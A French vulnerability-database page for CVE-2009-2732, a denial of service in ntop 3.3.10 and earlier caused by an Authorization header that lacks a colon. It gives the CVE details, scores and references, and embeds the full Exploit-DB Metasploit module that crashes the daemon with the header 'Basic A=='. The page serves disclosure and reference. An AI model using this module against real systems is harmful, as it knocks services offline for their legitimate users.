CVE-2009-2732 : Détail

CVE-2009-2732

Overflow
5.16%V3
Network
2009-08-20
20h00 +00:00
2018-10-10
16h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The checkHTTPpassword function in http.c in ntop 3.3.10 and earlier allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an Authorization HTTP header that lacks a : (colon) character in the base64-decoded string.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 33176

Date de publication : 2009-08-17 22h00 +00:00
Auteur : Brad Antoniewicz
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/36074/info The 'ntop' tool is prone to a denial-of-service vulnerability because of a NULL-pointer dereference that occurs when crafted HTTP Basic Authentication credentials are received by the embedded webserver. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. This issue affects ntop 3.3.10; other versions may also be affected. require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Name' => 'NTOP <= 3.3.10 Basic Authorization DoS', 'Description' => %q{ A denial of service condition can be reached by specifying an invalid value for the Authorization HTTP header. When ntop recieves this, it attempts to base64 decode the value then split it based on a colon. When no colon exists in the decoded string the username is left at its default NULL value. During the authentication process the length of the username is computed via strlen(), which results in a segmentation fault when it processes the null value. }, 'Author' => 'Brad Antoniewicz <brad.antoniewicz@foundstone.com>', 'License' => MSF_LICENSE, 'Version' => '1', 'References' => [ [ 'BID', 'None'], [ 'CVE', 'CVE-2009-2732'] ], 'DisclosureDate' => 'Aug 08 2009')) register_options( [Opt::RPORT(3000),], self.class ) end def run begin o = { 'uri' => '/configNtop.html', 'headers' => { 'Authorization' => 'Basic A==' } } c = connect(o) c.send_request(c.request_raw(o)) print_status("Request sent to #{rhost}:#{rport}") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout print_status("Couldn't connect to #{rhost}:#{rport}") rescue ::Timeout::Error, ::Errno::EPIPE end end end

Products Mentioned

Configuraton 0

Ntop>>Ntop >> Version To (including) 3.3.10

Références

http://secunia.com/advisories/36403
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2009/2317
Tags : vdb-entry, x_refsource_VUPEN
http://www.mandriva.com/security/advisories?name=MDVSA-2010:181
Tags : vendor-advisory, x_refsource_MANDRIVA